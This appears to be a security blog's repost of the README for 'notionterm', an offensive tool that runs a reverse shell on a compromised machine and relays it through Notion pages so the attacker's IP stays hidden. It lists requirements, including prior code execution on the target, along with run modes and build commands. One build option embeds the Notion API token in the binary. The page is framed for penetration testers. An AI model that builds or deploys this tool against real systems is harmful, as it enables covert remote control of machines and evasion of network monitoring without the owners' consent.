Site icon API Security Blog

Notionterm – Embed Reverse Shell In Notion Pages

[![](https://blogger.googleusercontent.com/img/a/AVvXsEhJ9iwaL3IPcQi0zGw-dDSkJE8XvX_ACXFbN2RQNMPDJmay1_sgzvLY18gyKKBT-1-KoePezecaHZ57jjoFA2ERn8JMm61ww9OjMXYUU0PFnp069JkQkW3T5FP2mfUvC-VD1gqF4Yzbr_U273-BgsN1UzBf5BQnvUux66p0lTR4xdWZdfH6CLbcALjw=s16000)]()

** Embed [reverse]( “reverse” ) shell in [Notion]( “Notion” ) pages.**
_Hack while taking notes_

[]( “??? Embed reverse shell in Notion pages (5)” )[![](https://blogger.googleusercontent.com/img/a/AVvXsEi6NULMA7E_OfBs-9kdWxPkgOi0Wrz9sqK7AboUzTCtWQgKtBuShfLvP5rW0ZHsCQ0fYGIEfHHhrB4aJiWRb9xLpol36fVC00DkGmwPgzB6wXWBiAxK7V9prtiiZVSCWPOR0DIMV5hX7CsNS8muu3FcxqyCBeBi9yiepT-apcRQBz6aElJB2nP-hMcS=w640-h428)]()

### FOR:

* Hiding attacker IP in reverse shell _(No direct interaction between attacker and target machine. Notion is used as a proxy hosting the reverse shell)_
* Demo/Quick proof insertion within report
* High available and shareable reverse shell (desktop, browser, mobile)
* Encrypted and authenticated [remote]( “remote” ) shell

### NOT FOR:

* Long and interactive shell session (see [tacos]( “tacos” ) for that)

### Why?

The focus was on making something fun while still being usable, but that’s not meant to be THE solution for reverse shell in the pentester’s arsenal

### How?

Just use notion as usual and launch `notionterm` on target.

### Requirements

* Notion software and API key
* Allowed HTTP communication from the target to the notion domain
* Prior RCE on target

> roughly inspired by the great idea of [OffensiveNotion]( “OffensiveNotion” ) and [notionion]( “notionion” )!

## Quickstart

### Set-up

1. Create a page and give to the integration API key the permissions to have page write access
2. Build `notionterm` and transfer it on target machine (see [install]( “install” ))

###

Run

There are 3 main ways to run `notionterm`:

**”normal” mode**
_Get terminal, stop/unstop it, etc…_ ` notionterm [flags] `
Start the shell with the button widget: turn `ON`, do you reverse shell stuff, turn `OFF` to pause, turn `ON` to resume etc… **”server” mode**
_Ease notionterm embedding in any page_ ` notionterm –server [flags] `
Start a shell session in any page by creating an embed block with URL containing the page id _(`CTRL+L`to get it)_: `https://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID]`. **`light` mode**
_Only perform HTTP [traffic]( “traffic” ) from target ? notion_ ` notionterm light [flags] `

## Install

As `notionterm` is aimed to be run on target machine it must be built to fit with it.

Thus set env var to fit with the target requirement:

GOOS=[windows/linux/darwin]

### Simple build

git clone https://github.com/ariary/notionterm.git && cd notionterm
GOOS=$GOOS go build notionterm.go

You will need to set API key and notion page URL using either env var (`NOTION_TOKEN` & `NOTION_PAGE_URL`) or flags (`–token` & `–page-url`)

### “All-inclusive” build

Embed directly the notion integration API token and notion page url in the binary. __

_everybody with [access]( “access” ) to the [binary]( “binary” ) can retrieved the token. For security reason don’t share it and remove it after use._

Set according env var:

export NOTION_PAGE_URL=[NOTION_PAGE_URL]
export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]

And build it:

git clone https://github.com/ariary/notionterm.git && cd notionterm
./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS go build notionterm.go

**[Download Notionterm]( “Download Notionterm” )**Read More

Exit mobile version